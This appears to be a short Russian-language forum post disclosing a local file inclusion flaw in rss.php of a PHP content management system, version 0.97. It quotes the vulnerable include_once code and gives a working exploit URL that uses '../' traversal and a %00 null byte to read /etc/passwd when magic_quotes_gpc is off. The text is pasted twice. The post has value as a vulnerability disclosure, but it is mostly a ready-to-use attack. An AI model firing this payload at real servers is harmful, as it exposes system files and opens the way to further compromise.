geezer.code
29.12.2009, 11:46
Version: 0.97
LFI
magic_quotes_gpc = Off или "особые обстоятельства"
//file rss.php
if (isset($_REQUEST['module'])) {
$module = $_REQUEST['module'];
.....
if (isset($module)) {
//get the RSS Items from the module
include_once('modules/'.$module.'/class.php');
Exploit:
http://exponent/rss.php?module=../../../../etc/passwd%00
зы насчет регстр глобалз я прогнал, это в другом месте.
LFI
magic_quotes_gpc = Off или "особые обстоятельства"
//file rss.php
if (isset($_REQUEST['module'])) {
$module = $_REQUEST['module'];
.....
if (isset($module)) {
//get the RSS Items from the module
include_once('modules/'.$module.'/class.php');
Exploit:
http://exponent/rss.php?module=../../../../etc/passwd%00
зы насчет регстр глобалз я прогнал, это в другом месте.